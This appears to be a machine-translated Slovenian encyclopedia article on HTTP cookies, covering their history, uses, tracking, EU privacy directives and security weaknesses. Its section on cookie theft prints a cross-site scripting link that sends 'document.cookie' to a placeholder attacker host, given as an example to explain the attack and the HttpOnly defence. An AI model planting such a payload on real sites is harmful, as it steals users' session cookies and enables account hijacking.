Internetni piškotek: kaj je to? Definicija, izvor, vrste in zasebnost

Un piškotek ali spletni piškotek (Ali piškotek, skrajšano kot Priča v Quebecu) je definiran s komunikacijskim protokolom HTTP kot zaporedje informacij, ki jih strežnik HTTP pošlje odjemalcu HTTP, ki jih slednji vrne vsakič, ko je pod določenimi pogoji poizveden isti strežnik HTTP.

Piškotek je enakovreden a majhna besedilna datoteka, shranjena na terminalu uporabnika interneta. Obstajajo že več kot 20 let in razvijalcem spletnih mest omogočajo shranjevanje uporabniških podatkov, da jim olajšajo navigacijo in omogočijo določene funkcionalnosti. Piškotki so bili vedno bolj ali manj sporni, ker vsebujejo ostanke osebnih podatkov, ki jih lahko tretje osebe potencialno izkoristijo.

Spletni strežnik ga kot glavo HTTP pošlje spletnemu brskalniku, ki ga vrne nespremenjenega vsakič, ko dostopa do strežnika. Piškotek se lahko uporablja za avtentikacijo, sejo (državna preživnina), in za shrani posebne podatke o uporabniku, kot so nastavitve spletnega mesta ali vsebina elektronskega nakupovalnega vozička. Izraz piškotek izhaja iz čarobni piškotek, dobro znan koncept v računalništvu UNIX, ki je navdihnil idejo in ime piškotkov brskalnika. Obstaja nekaj alternativ piškotkom, vsaka s svojo uporabo, prednostmi in slabostmi.

Ker so piškotki preproste besedilne datoteke, jih ni mogoče izvesti. Niso niti vohunske programske opreme niti virusov, čeprav piškotke z nekaterih spletnih mest zazna številna protivirusna programska oprema, ker omogočajo sledenje uporabnikom, ko obiščejo več spletnih mest. 

Večina sodobnih brskalnikov uporabnikom omogoča se odločite, ali boste piškotke sprejeli ali zavrnili. Uporabniki lahko tudi izberite, kako dolgo naj bodo shranjeni piškotki. Popolna zavrnitev piškotkov pa nekatere strani naredi neuporabne. Na primer, shranite nakupovalne vozičke ali spletna mesta, ki zahtevajo prijavo s poverilnicami (uporabniško ime in geslo).

Zgodovinski

Izraz piškotek izhaja iz angleškega izraza čarobni piškotek, ki je paket podatkov, ki jih program prejme in vrne nespremenjene. Piškotke so že uporabljali v IT, ko Lou Montulli imel idejo, da bi jih uporabil v spletni komunikaciji v juniju 1994. Takrat je bil zaposlen pri podjetju Netscape Communications, ki je za naročnika razvilo aplikacijo za e-trgovino. Piškotki so rešili problem zanesljivosti implementacije virtualne nakupovalne košarice v trgovini.

Istega leta sta John Giannandrea in Lou Montulli napisala Netscapeovo prvo specifikacijo piškotkov. Različica 0.9 beta Mosaic Netscape, izdana 13. oktobra 1994, integrirana tehnologija piškotkov (glej objavo). Prva (neeksperimentalna) uporaba piškotkov je bila ugotavljanje, ali so obiskovalci spletnega mesta Netscape že obiskali spletno mesto. Montulli je leta 1995 vložil patentno prijavo za tehnologijo piškotkov in ameriški patent 5774670 je bil odobren. podeljen leta 1998.

Po implementaciji v Netscape 0.9 beta leta 1994 so bili piškotki integrirani v Internet Explorer 2, izdan oktobra 1995.

Uvedba piškotkov v javnosti še ni bila širše znana. Predvsem so bili piškotki privzeto sprejeti v nastavitvah brskalnika in uporabniki niso bili obveščeni o njihovi prisotnosti. Nekateri ljudje so bili seznanjeni z obstojem piškotkov okoli prvega četrtletja leta 1995, vendar je širša javnost za njihov obstoj izvedela šele po objavi članka v Financial Timesu 12. februarja 1996. Istega leta so piškotki prejeli veliko medijske pozornosti zaradi možnih vdorov v zasebnost. Tema piškotkov je bila obravnavana na dveh posvetovanjih ameriške zvezne komisije za trgovino v letih 1996 in 1997.

Razvoj uradne specifikacije piškotkov je že potekal. Prve razprave o uradni specifikaciji so potekale aprila 1995 na poštnem seznamu www-talk. Oblikovana je bila posebna delovna skupina IETF. Brian Behlendorf in David Kristol sta predlagala dva alternativna predloga za uvedbo stanja v transakcije HTTP, vendar se je skupina, ki jo je vodil sam Kristol, odločila, da kot izhodišče uporabi Netscapeovo specifikacijo. Februarja 1996 je delovna skupina ugotovila, da so piškotki tretjih oseb pomembna grožnja zasebnosti. Specifikacija, ki jo je pripravila skupina, je bila na koncu objavljena kot RFC 2109.

Od konca leta 2014 na številnih spletnih mestih vidimo pasico o piškotkih. Obstaja vsaj ena razširitev brskalnika, ki omogoča pasica ni prikazana.

Vrste piškotkov in uporabe

Upravljanje sej

Piškotki se lahko uporabljajo za vzdrževanje uporabniških podatkov med navigacijo, pa tudi med večkratnimi obiski. Piškotki so bili uvedeni, da bi zagotovili sredstvo za izvajanje elektronskih nakupovalnih vozičkov, virtualne naprave, v kateri lahko uporabnik med brskanjem po spletnem mestu kopiči predmete, ki jih želi kupiti.

Te dni aplikacije, kot so nakupovalni vozički, namesto tega shranjujejo seznam artiklov v zbirko podatkov na strežniku, kar je bolje; kot da bi jih shranili v sam piškotek. Spletni strežnik pošlje piškotek, ki vsebuje edinstven ID seje. Spletni brskalnik nato vrne ta ID seje ob vsaki naslednji zahtevi in ​​elementi v košarici so shranjeni in povezani s tem istim edinstvenim ID-jem seje.

Pogosta uporaba piškotkov je koristna za prijavo na spletno mesto s poverilnicami. Skratka, spletni strežnik najprej pošlje piškotek, ki vsebuje edinstven ID seje. Nato uporabniki vnesejo svoje poverilnice (običajno uporabniško ime in geslo). Spletna aplikacija nato overi sejo in uporabniku omogoči dostop do storitve.

personalizacija

Piškotki se lahko uporabljajo za shranjevanje podatkov o uporabniku spletnega mesta, da bi mu v prihodnje prikazali ustrezno vsebino. Spletni strežnik lahko na primer pošlje piškotek, ki vsebuje zadnje uporabniško ime, uporabljeno za prijavo na to spletno mesto, tako da se lahko uporabniško ime vnaprej izpolni ob prihodnjih obiskih.

Številna spletna mesta uporabljajo piškotke za prilagajanje na podlagi uporabniških preferenc. Uporabniki izberejo svoje nastavitve v obrazcu in jih pošljejo strežniku. Strežnik zakodira nastavitve v piškotek in ga pošlje nazaj v brskalnik. Nato vsakič, ko uporabnik dostopa do strani tega spletnega mesta, brskalnik vrne piškotek in s tem seznam nastavitev; strežnik lahko nato prilagodi stran glede na želje uporabnika. Na primer, spletno mesto Wikipedia svojim uporabnikom omogoča, da izberejo preobleko spletnega mesta, ki jim je všeč. Iskalnik Google svojim uporabnikom (tudi če niso registrirani) omogoča izbiro števila rezultatov, ki jih želijo videti na vsaki strani z rezultati.

Sledenje

Sledilni piškotki se uporabljajo za sledenje brskalnim navadam uporabnikov interneta. To je mogoče delno storiti tudi z uporabo naslova IP računalnika, ki zahteva stran, ali z uporabo glave HTTP 'referrer', ki jo odjemalec pošlje z vsako zahtevo, vendar piškotki omogočajo večjo natančnost. To je mogoče storiti kot v naslednjem primeru:

1. Če uporabnik prikliče stran na spletnem mestu in zahteva ne vsebuje piškotka, strežnik predvideva, da je to prva stran, ki jo je uporabnik obiskal. Strežnik nato ustvari naključni niz in ga skupaj z zahtevano stranjo pošlje v brskalnik.
2. Od tega trenutka bo brskalnik samodejno poslal piškotek ob vsakem klicu nove strani spletnega mesta. Strežnik bo poslal stran kot običajno, vendar bo v dnevniško datoteko zabeležil tudi URL klicane strani, datum, čas zahteve in piškotek.

Z vpogledom v dnevniško datoteko je nato mogoče videti, katere strani je uporabnik obiskal in v kakšnem vrstnem redu. Na primer, če datoteka vsebuje nekaj zahtev, narejenih s piškotkom id=abc, lahko to ugotovi, da vse te zahteve prihajajo od istega uporabnika. Zahtevani URL, datum in ura, povezana z zahtevami, omogočajo sledenje brskanju uporabnika.

Piškotki in spletni svetilniki tretjih oseb, ki so razloženi spodaj, dodatno omogočajo sledenje na različnih spletnih mestih. Sledenje enemu mestu se običajno uporablja za statistične namene. Nasprotno pa sledenje na različnih spletnih mestih z uporabo piškotkov tretjih oseb običajno uporabljajo oglaševalska podjetja za ustvarjanje anonimnih uporabniških profilov (ki se nato uporabljajo za določanje, kateri oglasi naj bodo prikazani uporabniku, in za pošiljanje e-poštnih sporočil, ki ustrezajo tem oglasom – SPAM ).

Sledilni piškotki predstavljajo tveganje vdora v zasebnost uporabnika, vendar jih je mogoče enostavno izbrisati. Večina sodobnih brskalnikov vključuje možnost samodejnega brisanja trajnih piškotkov, ko zaprete aplikacijo.

Piškotki tretjih oseb

Slike in drugi predmeti na spletni strani so lahko na strežnikih, ki niso gostitelji strani. Za prikaz strani brskalnik prenese vse te predmete. Večina spletnih mest vsebuje informacije iz različnih virov. Če na primer v brskalnik vtipkate www.example.com, bodo na delu strani pogosto predmeti ali oglasi, ki prihajajo iz različnih virov, to je iz druge domene kot www. .example.com. Piškotki prve strani so piškotki, ki jih nastavi domena, navedena v naslovni vrstici brskalnika. Piškotke tretjih oseb nastavi eden od predmetov strani, ki prihaja iz druge domene.

Brskalniki, kot so Mozilla Firefox, Microsoft Internet Explorer in Opera, privzeto sprejemajo piškotke tretjih oseb, vendar lahko uporabniki spremenijo nastavitve v možnostih brskalnika in jih blokirajo. Piškotki tretjih oseb, ki omogočajo spletno funkcionalnost, ne predstavljajo varnostnega tveganja, vendar se uporabljajo tudi za sledenje uporabnikom. od mesta do mesta.

Orodja, kot je Ghostery, ki so na voljo za vse brskalnike, vključno z Google Chromom, lahko blokirajo izmenjave med tretjimi osebami.

Izvedba

Piškotki so majhni deli podatkov, ki jih spletni strežnik pošlje brskalniku. Brskalnik jih nespremenjene vrne strežniku in tako vnese stanje (spomin na pretekle dogodke) v sicer transakcijo HTTP brez stanja. Brez piškotkov je vsaka pridobitev spletne strani ali komponente spletne strani izoliran dogodek, neodvisen od drugih zahtev istega mesta. Poleg tega, da jih lahko nastavi spletni strežnik, lahko piškotke nastavijo tudi skriptni jeziki, kot je JavaScript, če jih podpira in odobri brskalnik.

Uradna specifikacija piškotkov nakazuje, da morajo imeti brskalniki možnost shranjevanja in ponovnega pošiljanja minimalnega števila piškotkov. Natančneje, brskalnik bi moral imeti možnost shraniti vsaj 300 piškotkov po štiri kilobajte in vsaj 20 piškotkov za posamezen strežnik ali domeno.

V skladu z oddelkom 3.1 RFC 2965, imena piškotkov ne razlikujejo med velikimi in malimi črkami.

Piškotek lahko določi datum njegove veljavnosti in v tem primeru bo piškotek na ta datum izbrisan. Če piškotek ne določa datuma poteka, se piškotek izbriše takoj, ko uporabnik zapusti svoj brskalnik. Zato je določitev datuma poteka način, da piškotek preživi več sej. Iz tega razloga naj bi bili piškotki z rokom veljavnosti obstojne. Primer uporabe: maloprodajno mesto lahko uporablja trajne piškotke za beleženje artiklov, ki so jih uporabniki dali v svoj nakupovalni voziček (v resnici se piškotek lahko nanaša na vnos, shranjen v zbirki podatkov na prodajnem mestu in ne v vašem računalniku) . Na ta način bodo lahko uporabniki, če zapustijo brskalnik, ne da bi opravili nakup, in se vanj vrnejo pozneje, ponovno našli izdelke v košarici. Če ti piškotki ne bi imeli datuma veljavnosti, bi potekli ob zaprtju brskalnika, podatki o vsebini košarice pa bi bili izgubljeni.

Piškotke je mogoče omejiti na določeno domeno, poddomeno ali pot na strežniku, ki jih je ustvaril.

Izdelava piškotka

Prenos spletnih strani poteka s protokolom za prenos hiperbesedila (HTTP). Z ignoriranjem piškotkov brskalniki pokličejo stran s spletnih strežnikov tako, da jim običajno pošljejo kratko besedilo HTTP zahteva. Na primer, za dostop do strani www.example.org/index.html se brskalniki povežejo s strežnikom www.example.org in pošljejo zahtevo, ki je videti takole:

	GET /index.html HTTP/1.1Host: www.example.org
navigator	→	serveur

Strežnik se odzove tako, da pošlje zahtevano stran, pred katero je podobno besedilo, celotno pa se pokliče HTTP odgovor. Ta paket lahko vsebuje vrstice, ki brskalniku dajejo navodila za shranjevanje piškotkov:

	HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value (HTML stran)
navigator	←	serveur

Strežnik pošlje vrstico Set-Cookie samo, če želi, da brskalnik shrani piškotek. Set-Cookie je zahteva, da brskalnik shrani niz ime=vrednost in ga vrne v vseh prihodnjih zahtevah strežniku. Če brskalnik podpira piškotke in so piškotki omogočeni v možnostih brskalnika, bo piškotek vključen v vse nadaljnje zahteve istemu strežniku. Na primer, brskalnik pokliče stran www.example.org/news.html tako, da strežniku www.example.org pošlje naslednjo zahtevo:

	GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
navigator	→	serveur

To je zahteva za drugo stran z istega strežnika in se razlikuje od prve zgoraj, ker vsebuje niz, ki ga je strežnik predhodno poslal brskalniku. Zahvaljujoč temu sredstvu strežnik ve, da je ta zahteva povezana s prejšnjo. Strežnik se odzove tako, da pošlje klicano stran in ji doda druge piškotke.

Vrednost piškotka lahko strežnik spremeni tako, da pošlje novo vrstico Set-Cookie: name=new_value kot odgovor na klicano stran. Brskalnik nato zamenja staro vrednost z novo.

Vrstico Set-Cookie običajno ustvari program CGI ali drug skriptni jezik, ne pa strežnik HTTP. Strežnik HTTP (primer: Apache) bo brskalniku posredoval le rezultat programa (dokument, pred katerim je glava s piškotki).

Piškotke lahko nastavi tudi JavaScript ali drugi podobni jeziki, ki se izvajajo v brskalniku, torej na strani odjemalca in ne na strani strežnika. V JavaScriptu se za ta namen uporablja objekt document.cookie. Izjava document.cookie = "temperature=20" na primer ustvari piškotek z imenom "temperature" in z vrednostjo 20.

Atributi piškotka

Piškotek lahko poleg para ime/vrednost vsebuje tudi datum poteka, pot, ime domene in vrsto predvidene povezave, to je običajna ali šifrirana. RFC 2965 tudi opredeljuje, da morajo imeti piškotki obvezno številko različice, vendar je ta na splošno izpuščena. Ti podatkovni deli sledijo paru ime=nova_vrednost in so ločeni s podpičji. Na primer, piškotek lahko ustvari strežnik tako, da pošlje vrstico Set-Cookie: name=new_value; expires=datum; pot=/; domena=.example.org.

Potek piškotka

Piškotki potečejo in jih nato brskalnik ne pošlje strežniku v naslednjih primerih:

• Ko je brskalnik zaprt, če piškotek ni obstojen.
• Ko poteče datum veljavnosti piškotka.
• Ko se datum poteka piškotka spremeni (strežnik ali skript) na datum v preteklosti.
• Ko brskalnik na zahtevo uporabnika izbriše piškotek.

Tretja situacija omogoča strežnikom ali skriptom, da eksplicitno izbrišejo piškotek. Upoštevajte, da je s spletnim brskalnikom Google Chrome mogoče izvedeti datum poteka določenega piškotka z dostopom do nastavitev vsebine. Piškotek, shranjen v računalniku, lahko tam ostane več desetletij, če se ne izbriše noben postopek.

Stereotipi

Od njihove uvedbe na internetu je po spletu in medijih zakrožilo veliko idej o piškotkih. Leta 1998 je CIAC, ekipa Ministrstva za energijo Združenih držav Amerike za spremljanje računalniških incidentov, ugotovila, da varnostne ranljivosti piškotkov "v bistvu ne obstajajo" in pojasnila, da "informacije o izvoru vaših obiskov in podrobnosti o spletnih straneh, ki ste jih obiskali, že obstajajo v dnevniških datotekah spletnih strežnikov«. Leta 2005 je Jupiter Research objavil rezultate študije, v kateri je velik odstotek anketirancev upošteval naslednje trditve:

• Piškotki so podobni virus, okužijo trde diske uporabnikov.
• Piškotki ustvarjajo pop-up.
• Piškotki se uporabljajo za pošiljanje spam.
• Piškotki se uporabljajo samo za oglaševanje.

Piškotki ne morejo izbrisati ali prebrati informacij iz uporabnikovega računalnika. Vendar pa piškotki omogočajo zaznavanje spletnih strani, ki jih uporabnik obišče na določenem spletnem mestu ali nizu spletnih mest. Te podatke je mogoče zbrati v uporabniškem profilu, ki ga je mogoče uporabiti ali preprodati tretjim osebam, kar lahko povzroči resne težave z zasebnostjo. Nekateri profili so sicer anonimni, v smislu, da ne vsebujejo osebnih podatkov, vendar so lahko tudi takšni profili vprašljivi.

Po isti študiji velik odstotek uporabnikov interneta ne zna izbrisati piškotkov. Eden od razlogov, zakaj ljudje ne zaupajo piškotkom, je, da so nekatera spletna mesta zlorabila vidik piškotkov, ki omogočajo osebno identifikacijo, in te podatke delila z drugimi viri. Velik odstotek ciljanega oglaševanja in nezaželene e-pošte, ki velja za neželeno pošto, prihaja iz informacij, zbranih iz sledilnih piškotkov.

Nastavitve brskalnika

Večina brskalnikov podpira piškotke in uporabniku omogoča, da jih onemogoči. Najpogostejše možnosti so:

• Popolnoma omogočite ali onemogočite piškotke, tako da so stalno sprejeti ali blokirani.
• Omogočite uporabniku, da vidi aktivne piškotke na določeni strani, tako da v naslovno vrstico brskalnika vnese javascript: alert(document.cookie). Nekateri brskalniki vključujejo upravitelja piškotkov za uporabnika, ki si lahko ogleda in selektivno izbriše piškotke, ki so trenutno shranjeni v brskalniku.

Večina brskalnikov omogoča tudi popoln izbris osebnih podatkov, vključno s piškotki. Obstajajo tudi dodatni moduli za nadzor dovoljenj za piškotke.

Zasebnost in piškotki tretjih oseb

V tem izmišljenem primeru je oglaševalsko podjetje postavilo pasice na dve spletni strani. Z gostovanjem pasic na svojih strežnikih in uporabo piškotkov tretjih oseb lahko oglaševalsko podjetje sledi uporabnikovi navigaciji po teh dveh straneh.

Piškotki imajo pomembne posledice za zasebnost in anonimnost spletnih uporabnikov. Čeprav se piškotki pošljejo le nazaj na strežnik, ki jih je nastavil, ali na strežnik, ki pripada isti internetni domeni, lahko spletna stran vsebuje slike ali druge komponente, shranjene na strežnikih, ki pripadajo drugim domenam. Kličejo se piškotki, ki se nastavijo med obnovitvijo teh zunanjih komponent piškotki tretjih oseb. To vključuje piškotke iz neželenih pojavnih oken.

Oglaševalska podjetja uporabljajo piškotke tretjih oseb za sledenje uporabnikom na različnih spletnih mestih, ki jih obiščejo. Zlasti oglaševalsko podjetje lahko sledi uporabniku na vseh straneh, kjer je postavilo oglaševalske slike ali sledilni piksel. Poznavanje strani, ki jih obišče uporabnik, omogoča oglaševalskemu podjetju, da cilja na oglaševalske preference uporabnika.

Nekateri menijo, da je možnost ustvarjanja uporabniškega profila vdor v zasebnost, zlasti če se sledenje izvaja v različnih domenah z uporabo piškotkov tretjih oseb. Zaradi tega imajo nekatere države zakonodajo o piškotkih.

Vlada Združenih držav je leta 2000 uvedla stroga pravila o namestitvi piškotkov, potem ko je bilo razkrito, da urad Bele hiše za politiko drog uporablja piškotke za sledenje računalnikom uporabnikov, ki gledajo spletne oglase za zdravila. Leta 2002 je aktivist za zasebnost Daniel Brandt odkril, da je Cia pustila trajne piškotke na računalnikih, ki so obiskali njene spletne strani. Ko je bila obveščena o tej kršitvi, je CIA izjavila, da ti piškotki niso bili poslani namerno, in jih prenehala nastavljati. 25. decembra 2005 je Brandt odkril, da je Agencija za nacionalno varnost (NSA) pustila dva trajna piškotka na računalnikih obiskovalcev zaradi posodobitve programske opreme. Po obvestilu je NSA takoj onemogočila piškotke.

V Združenem kraljestvu je Zakon o piškotkih “, ki je stopil v veljavo 25. maja 2012, zavezuje strani k izjavi o svojih namerah in tako uporabnikom omogoča izbiro, ali želijo pustiti sledi svojega prehoda na internetu ali ne. Tako so lahko zaščiteni pred ciljanjem oglaševanja. vendar po navedbah Guardian, privolitev uporabnikov interneta ni nujno izrecna; spremenjeni so bili pogoji uporabniškega soglasja, zaradi česar je tako implicirano.

Direktiva 2002/58 o zasebnosti

Direktiva 202/58 o zasebnosti in elektronskih komunikacijah vsebuje pravila o uporabi piškotkov. Zlasti člen 5, odstavek 3 te direktive zahteva, da je shranjevanje podatkov (kot so piškotki) v uporabnikovem računalniku možno le, če:

• uporabnik je obveščen o tem, kako se podatki uporabljajo;
• uporabnik ima možnost, da zavrne to operacijo shranjevanja. Vendar ta člen tudi navaja, da je shranjevanje podatkov iz tehničnih razlogov izvzeto iz tega zakona.

Direktiva, ki naj bi se začela izvajati od oktobra 2003, se je v praksi le zelo nepopolno izvajala glede na poročilo iz decembra 2004, ki je tudi poudarilo, da nekatere države članice (Slovaška, Latvija, Grčija, Belgija in Luksemburg) še niso prenesle direktivo v domačo zakonodajo.

Po mnenju G29 iz leta 2010 se ta direktiva, ki predvsem pogojuje uporabo piškotkov za namene vedenjskega oglaševanja z izrecno privolitvijo internetnega uporabnika, še vedno zelo slabo izvaja. Pravzaprav večina spletnih mest to počne na način, ki ni v skladu z direktivo, tako da se omejijo na preprosto "pasico", ki obvešča o uporabi "piškotkov", ne da bi podala informacije o uporabi, ne da bi razlikovala med "tehničnimi" piškotki. »sledilnih« piškotkov, niti ponuditi prave izbire uporabniku, ki želi vzdrževati tehnične piškotke (kot so piškotki za upravljanje nakupovalne košarice) in zavrniti »sledilne« piškotke. Dejansko veliko spletnih mest ne deluje pravilno, če so piškotki zavrnjeni, kar ni v skladu z direktivo 2002/58 ali direktivo 95/46 (Varstvo osebnih podatkov).

Direktiva 2009/136 / CE

To gradivo je bilo posodobljeno z Direktivo 2009/136/ES z dne 25. novembra 2009, ki določa, da je "shranjevanje informacij ali pridobivanje dostopa do že shranjenih informacij v terminalski opremi naročnika ali uporabnika dovoljeno samo pod pogojem, da naročnik ali uporabnik dal soglasje, potem ko je v skladu z Direktivo 95/46/ES prejel jasne in popolne informacije med drugimi o namenu obdelave. Nova direktiva torej krepi obveznosti pred namestitvijo piškotkov na računalnik internetnega uporabnika.

Vendar pa evropski zakonodajalec v predhodnih premislekih direktive določa: "Kjer je tehnično izvedljivo in učinkovito, v skladu z ustreznimi določbami Direktive 95/46/ES, se soglasje uporabnika glede obdelave lahko izrazi prek uporaba ustreznih nastavitev brskalnika ali druge aplikacije«. Toda v resnici noben brskalnik doslej ne omogoča ločitve bistvenih tehničnih piškotkov od izbirnih, ki bi morali biti prepuščeni izbiri uporabnika.

To novo direktivo so belgijski poslanci prenesli julija 2012. Študija iz leta 2014 kaže, da imajo celo poslanci težave pri uporabi omejitve direktive.

P3P

Specifikacija P3P vključuje zmožnost strežnika, da navede politiko zasebnosti, ki določa, kakšne informacije zbira in za kakšen namen. Ti pravilniki vključujejo (vendar niso omejeni na) uporabo informacij, zbranih s piškotki. V skladu z definicijami P3P lahko brskalnik sprejme ali zavrne piškotke tako, da primerja pravilnike o zasebnosti z uporabnikovimi preferencami ali tako, da uporabnika vpraša in predstavi izjavo o zasebnosti pravilnika o zasebnosti, ki jo je objavil strežnik.

Številni brskalniki, vključno z različicama 6 in 7 Apple Safari in Microsoft Internet Explorer, podpirajo P3P, ki brskalniku omogoča, da določi, ali sprejme shranjevanje piškotkov tretjih oseb. Brskalnik Opera omogoča uporabnikom, da zavrnejo piškotke tretjih oseb in ustvarijo globalni in specifični varnostni profil za internetne domene. Mozilla Firefox različica 2 je opustila podporo za P3P, vendar jo je ponovno vzpostavila v različici 3.

Večina brskalnikov lahko blokira piškotke tretjih oseb, da poveča zasebnost in zmanjša sledenje oglasom, ne da bi to negativno vplivalo na uporabnikovo spletno izkušnjo. Številne oglaševalske agencije ponujajo možnost odjaviti ciljanemu oglaševanju, z nastavitvijo generičnega piškotka v brskalniku, ki to ciljanje deaktivira, vendar taka rešitev ni praktično učinkovita, če se spoštuje, saj se ta generični piškotek izbriše takoj, ko uporabnik te piškotke izbriše, kar prekliče opt. ven odločitev.

Slabosti piškotkov

Poleg težav z zasebnostjo imajo piškotki tudi nekatere tehnične pomanjkljivosti. Zlasti ne identificirajo vedno natančno uporabnikov, lahko upočasnijo delovanje spletnega mesta, ko so v velikem številu, lahko se uporabljajo za varnostne napade in so v nasprotju s prenosom reprezentativnega stanja, arhitekturnim slogom programske opreme.

Nenatančna identifikacija

Če se na računalniku uporablja več kot en brskalnik, je v vsakem od njih vedno ločena enota za shranjevanje piškotkov. Piškotki torej ne identificirajo osebe, temveč kombinacijo uporabniškega računa, računalnika in spletnega brskalnika. Tako lahko vsakdo uporablja te račune, računalnike ali brskalnike, ki imajo nabor piškotkov. Podobno piškotki ne razlikujejo med več uporabniki, ki si delijo isti uporabniški račun, računalnik in brskalnik, na primer v »internetnih kavarnah« ali katerem koli mestu, ki omogoča prost dostop do računalniških virov.

Toda v praksi se ta trditev v večini primerov izkaže za napačno, saj danes »osebni« računalnik (ali pametni telefon ali tablico, kar je še huje) uporablja predvsem en sam posameznik. preko količine zbranih informacij pridejo do prilagojenega ciljanja, tudi če oseba ni »natančno« identificirana.

Kraja piškotkov

Piškotek lahko ukrade drug računalnik v omrežju.

Med običajnim delovanjem se piškotki pošiljajo nazaj med strežnikom (ali skupino strežnikov v isti domeni) in brskalnikom uporabnikovega računalnika. Ker lahko piškotki vsebujejo občutljive informacije (uporabniško ime, geslo za preverjanje pristnosti itd.), njihove vrednosti ne smejo biti dostopne drugim računalnikom. Kraja piškotkov je dejanje prestrezanja piškotkov s strani nepooblaščene tretje osebe.

Piškotki se lahko ukradejo z vohanjem paketov v napadu, imenovanem ugrabitev seje. Promet v omrežju lahko prestrežejo in berejo računalniki, ki niso tisti, ki pošiljajo in prejemajo (zlasti v nešifriranem javnem prostoru Wi-Fi). Ta promet vključuje piškotke, poslane prek sej z uporabo navadnega protokola HTTP. Ko omrežni promet ni šifriran, lahko zlonamerni uporabniki berejo komunikacije drugih uporabnikov v omrežju s pomočjo "vohača paketov".

To težavo je mogoče rešiti s šifriranjem povezave med uporabnikovim računalnikom in strežnikom s protokolom HTTPS. Strežnik lahko poda a varna zastava med nastavljanjem piškotka; brskalnik ga bo poslal samo po varni liniji, kot je povezava SSL.

Vendar mnoga spletna mesta, čeprav uporabljajo šifrirano komunikacijo HTTPS za preverjanje pristnosti uporabnika (tj. stran za prijavo), kasneje pošiljajo sejne piškotke in druge podatke kot običajno prek nešifriranih povezav HTTP zaradi učinkovitosti. Napadalci lahko tako prestrežejo piškotke drugih uporabnikov in se zanje izdajo na ustreznih straneh ali pa jih uporabijo v napadih na piškotke.

Skriptiranje na spletnem mestu: piškotek, ki bi se moral izmenjati le med strežnikom in odjemalcem, se pošlje drugi tretji osebi.

Drug način za krajo piškotkov je, da spletna mesta skriptirajo in brskalnik sam pošlje piškotke zlonamernim strežnikom, ki jih nikoli ne prejmejo. Sodobni brskalniki omogočajo izvajanje iskanih delov kode s strežnika. Če se do piškotkov dostopa med izvajanjem, se lahko njihove vrednosti v neki obliki sporočijo strežnikom, ki do njih ne bi smeli dostopati. Šifriranje piškotkov, preden so poslani po omrežju, ne pomaga preprečiti napada.

To vrsto skriptiranja na spletnem mestu običajno uporabljajo napadalci na spletnih mestih, ki uporabnikom omogočajo objavo vsebine HTML. Z vključitvijo dela združljive kode v prispevek HTML lahko napadalec prejme piškotke od drugih uporabnikov. Poznavanje teh piškotkov se lahko uporabi tako, da se z uporabo ukradenih piškotkov povežete z istim mestom in ste tako prepoznani kot uporabnik, katerega piškotki so bili ukradeni.

Eden od načinov za preprečevanje takšnih napadov je uporaba zastavice HttpOnly; to je možnost, uvedena od različice 6 Internet Explorerja v PHP od različice 5.2.0, ki naj bi naredila piškotek nedostopen odjemalcu blizu skripta. Vendar bi morali spletni razvijalci to upoštevati pri razvoju svojega spletnega mesta, da bodo imuni na skriptiranje na spletnem mestu.

Druga uporabljena varnostna grožnja je izmišljotina povpraševanja na spletnem mestu.

Uradne tehnične specifikacije dovoljujejo, da se piškotki pošljejo nazaj samo na strežnike v domeni, iz katere izvirajo. Vendar se lahko vrednost piškotkov pošlje drugim strežnikom z drugimi sredstvi in ​​ne z glavami piškotkov.

Zlasti skriptnim jezikom, kot je JavaScript, je na splošno dovoljen dostop do vrednosti piškotkov in so sposobni pošiljati poljubne vrednosti kateremu koli strežniku v internetu. Ta zmožnost skriptiranja se uporablja na spletnih mestih, ki uporabnikom omogočajo objavo vsebine HTML, ki si jo lahko ogledajo drugi uporabniki.

Napadalec, ki deluje na domeni example.com, lahko na primer objavi komentar, ki vsebuje naslednjo povezavo, ki kaže na priljubljen spletni dnevnik, ki ga sicer ne nadzoruje:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Ko drug uporabnik klikne to povezavo, brskalnik izvede del kode atributa onclick, tako da niz document.cookie nadomesti s seznamom uporabniških piškotkov, ki so aktivni za to stran. Zato se ta seznam piškotkov pošlje strežniku example.com in napadalec lahko pobere piškotke tega uporabnika.

To vrsto napada je na strani uporabnika težko odkriti, ker skript prihaja iz iste domene, ki je nastavila piškotek, in zdi se, da je operacijo pošiljanja vrednosti odobrila ta domena. Šteje se, da so skrbniki, ki upravljajo to vrsto strani, odgovorni za uvedbo omejitev, ki preprečujejo objavo zlonamerne kode.

Piškotki niso neposredno vidni programom na strani odjemalca, kot je JavaScript, če so bili poslani z zastavico HttpOnly. Z vidika strežnika je razlika le v tem, da je v vrstici glave Set-Cookie dodano novo polje, ki vsebuje niz HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Ko brskalnik prejme tak piškotek, naj bi ga normalno uporabil v naslednji izmenjavi HTTP, vendar ne da bi bil viden skriptom, ki se izvajajo na strani odjemalca. Zastavica HttpOnly ni del nobene uradne tehnične specifikacije in ni implementirana v vseh brskalnikih. Upoštevajte, da trenutno ni načina za preprečitev branja in zapisovanja sejnih piškotkov z metodo XMLHTTPRequest.

Spreminjanje vsebine: napadalec strežniku pošlje neveljaven piškotek, po možnosti narejen iz veljavnega piškotka, ki ga pošlje strežnik.

Spreminjanje piškotkov

Takoj ko je treba piškotke shraniti in nespremenjene vrniti strežniku, lahko napadalec spremeni vrednost piškotkov, preden se pošljejo nazaj na strežnik. Na primer, če piškotek vsebuje skupno vrednost, ki jo mora uporabnik plačati za izdelke v nakupovalni košarici trgovine, sprememba te vrednosti izpostavi strežnik tveganju, da bo napadalcu zaračunal manj od začetne cene. Postopek spreminjanja vrednosti piškotkov se imenuje zastrupitev s piškoti in se lahko uporabi po kraji piškotkov, da bo napad vztrajen.

Pri metodi preglasitve piškotkov napadalec izkoristi napako brskalnika, da strežniku pošlje neveljaven piškotek.

Večina spletnih mest pa v sam piškotek shrani le ID seje – naključno ustvarjeno edinstveno številko, ki se uporablja za identifikacijo uporabnika seje –, medtem ko so vse druge informacije shranjene na strežniku. V tem primeru je ta problem v veliki meri rešen.

Upravljanje piškotkov med spletnimi mesti

